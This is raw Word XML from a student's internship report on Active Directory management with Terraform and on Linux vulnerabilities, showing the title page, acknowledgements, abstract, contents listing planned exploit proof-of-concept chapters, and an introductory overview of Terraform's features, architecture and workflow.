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54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A Summer Internship Project Report </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000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On</w:t>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Active Directory Management using Terraform and Linux OS Vulnerabilities</w:t>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Submitted in partial fulfillment of the requirements </w:t>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For the degree of</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000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Bachelor of Technology in Information Technology </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000007">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w:t>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Purva Dadhich (22EJCIT131)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000009">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EXTERNAL SUPERVISOR </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000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Prof. Vijay Laxmi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000C">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Department of Computer Science &amp; Engineering – MNIT Jaipur</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000D">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Faculty Supervisor </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000F">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Mr. Rohit Chabbra</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000010">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Department of Information Technology – JECRC Foundation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000011">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Information Technology </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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Jaipur Engineering College &amp; Research Centre </w:t>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line="259"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ACKNOWLEDGEMENTS</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000017">
      <w:pPr>
        <w:spacing w:line="259"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would like to express my sincere gratitude to Prof. Vijay Laxmi of the Department of Computer Science and Engineering at MNIT Jaipur for their invaluable guidance and support throughout my project on Active Directory Management and Linux Operating System Vulnerabilities. Their expertise and insights were crucial to the successful completion of this work.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000019">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also extend my heartfelt thanks to Mrs. Amita Kashyap and Miss Amita Jangid for their unwavering support and contributions during my internship. Their mentorship and dedication were instrumental in helping me navigate the challenges faced during this project.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001A">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Sincerely,</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Purva Dadhich</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">B.Tech, 2nd Year (22EJCIT131)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001B">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259"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ABSTRACT</w:t>
      </w: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titled "Active Directory Management using Terraform and Linux OS Vulnerabilities" focused on identifying and exploiting vulnerabilities within the Linux operating system and integrating Active Directory services. The primary objective was to create and assess vulnerable environments, exploit them and understand the implications of these security flaws. By leveraging proof-of-concept exploits, the project demonstrated how vulnerabilities within Linux systems could be exploited in real-world scenarios. Additionally, the internship included managing and configuring Active Directory, highlighting the critical role of secure directory services in organizational security. This dual focus provided a comprehensive understanding of both offensive and defensive cybersecurity practices.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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259"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259"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CONTENTS</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003D">
      <w:pPr>
        <w:spacing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rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003E">
      <w:pPr>
        <w:widowControl w:val="1"/>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8140"/>
        </w:tabs>
        <w:spacing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ACKNOWLEDGEMENTS                                              </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">                        2</w:t>
        <w:tab/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ABSTRACT</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">                                             3</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CHAPTER 1: Terraform </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003F">
      <w:pPr>
        <w:widowControl w:val="1"/>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What is Terraform?</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">          5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000040">
      <w:pPr>
        <w:widowControl w:val="1"/>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Key Features of Terraform</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">                      5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000041">
      <w:pPr>
        <w:widowControl w:val="1"/>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Benefits of Using Terraform</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">                      5-6</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000042">
      <w:pPr>
        <w:widowControl w:val="1"/>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Terraform Architecture</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">          6</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000043">
      <w:pPr>
        <w:widowControl w:val="1"/>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Terraform Workflow                                                                               7</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000044">
      <w:pPr>
        <w:widowControl w:val="1"/>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Terraform Use Cases                                                                               8</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000045">
      <w:pPr>
        <w:widowControl w:val="1"/>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 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Terraform Script for provision of Active directory on Cloud</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">                 8-9</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000046">
      <w:pPr>
        <w:widowControl w:val="1"/>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Challenges and Considerations                                                                9-10</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000047">
      <w:pPr>
        <w:widowControl w:val="1"/>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 Conclusion                                                                                               10</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000048">
      <w:pPr>
        <w:widowControl w:val="1"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1.10 Active Directory Setup</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">                                                                          10-19</w:t>
      </w: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CHAPTER 2: VULNERABLE VIRTUAL MACHINES </w:t>
      </w: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Introduction to Vulnerable Virtual Machines</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">            20</w:t>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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PoC: Container Escape</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">            20-23</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004C">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PoC: Kernel Privilege Escalation</w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">                                                24-26</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004D">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PoC: Privilege Escalation</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">                                                27-28</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004E">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REFERENCES</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">29</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004F">
      <w:pPr>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259"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1">
      <w:pPr>
        <w:spacing w:line="259"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2">
      <w:pPr>
        <w:spacing w:line="259"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3">
      <w:pPr>
        <w:spacing w:line="259"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32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Terraform</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000057">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>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b w:val="1"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1.1 What is Terraform?</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000058">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Terraform is an open-source infrastructure as code (IaC) tool developed by HashiCorp. It enables users to define and provision data center infrastructure using a high-level configuration language. Terraform is designed to efficiently manage complex multi-cloud environments, allowing for the automation of cloud infrastructure. One of its key advantages is its ability to work with various cloud service providers, including AWS, Azure, Google Cloud, and others. With Terraform, users can describe their desired infrastructure state in configuration files, and Terraform handles the provisioning and management, ensuring that the infrastructure remains consistent and compliant with the specified configurations.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000059">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>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b w:val="1"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1.2 Key Features of Terraform</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005A">
      <w:pPr>
        <w:spacing w:after="28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Terraform boasts several features that make it a preferred choice for managing infrastructure:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>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Declarative Configuration:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Terraform allows users to define the desired end state of the infrastructure, and it automatically determines the necessary steps to achieve that state. This declarative approach simplifies infrastructure management by abstracting the underlying complexity.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>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Execution Plans:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Before making any changes, Terraform generates an execution plan that outlines the actions it will take. This "plan" step provides a clear view of the modifications that will occur, allowing users to review and approve changes before they are applied.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>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Resource Graph:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Terraform builds a resource graph to represent the dependencies between resources. By analyzing this graph, Terraform can determine the optimal order of operations, ensuring that resources are created, updated, or destroyed in the correct sequence.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>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State Management:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Terraform maintains a state file that tracks the current state of the infrastructure. This file allows Terraform to detect changes and apply only the necessary modifications, preventing drift and maintaining consistency.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005F">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>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b w:val="1"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1.3 Benefits of Using Terraform</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000060">
      <w:pPr>
        <w:spacing w:after="28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Terraform for infrastructure management offers several advantages:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000061">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>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Infrastructure as Code (IaC):</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Terraform enables teams to manage infrastructure using code that can be version-controlled. This approach enhances collaboration, reduces manual errors, and provides a clear history of changes.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000062">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>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Multi-Cloud Support:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Terraform's ability to work across multiple cloud providers makes it ideal for managing hybrid and multi-cloud environments. Organizations can use Terraform to manage resources on different platforms with a consistent workflow.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000063">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>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Scalability:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Terraform automates the provisioning of resources, making it easier to scale infrastructure up or down based on demand. This scalability ensures that the infrastructure can adapt to changing needs without manual intervention.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000064">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>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Reusability:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Terraform modules allow users to create reusable components, such as virtual machines, networks, or storage, that can be shared across multiple projects. This modularity saves time and reduces the risk of duplication.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000065">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>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b w:val="1"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1.4 Terraform Architecture</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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Terraform's architecture consists of several core components that work together to manage infrastructure:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000067">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>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Terraform Core:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> At the heart of Terraform is Terraform Core, which takes user-defined configuration files, creates an execution plan, and applies the changes to the infrastructure. It is responsible for managing the lifecycle of resources, ensuring that the infrastructure is in the desired state.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000068">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>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Providers:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Terraform interacts with various cloud services through providers. Each provider is responsible for managing resources specific to a particular service, such as AWS, Azure, or Google Cloud. Providers define the available resources and data sources and handle the API interactions required to create, update, or delete resources.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000069">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>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Modules:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Modules in Terraform are reusable configurations that group multiple resources together. By encapsulating related resources into modules, users can manage complex infrastructure more efficiently. Modules promote consistency and reduce redundancy by allowing common patterns to be reused across different parts of the infrastructure.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006A">
      <w:pPr>
        <w:spacing w:after="28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940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80" w:before="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pStyle w:val="Heading4"/>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b w:val="1"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1.5 Terraform Workflow</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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typical Terraform workflow involves several steps that guide the process of managing infrastructure:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>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Writing Configuration:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:rtl w:val="0"/>
        </w:rPr>
